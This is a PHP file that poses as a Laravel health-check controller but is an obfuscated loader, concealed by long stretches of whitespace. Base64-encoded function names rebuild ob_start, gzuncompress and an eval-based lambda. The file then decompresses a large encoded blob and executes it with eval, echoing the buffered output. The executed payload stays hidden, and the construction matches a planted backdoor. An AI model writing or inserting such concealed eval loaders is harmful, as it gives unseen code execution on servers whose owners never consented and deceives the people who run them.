<?php 
        $__='printf';$_='Loading app/Http/Controllers/HealthCheckController.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
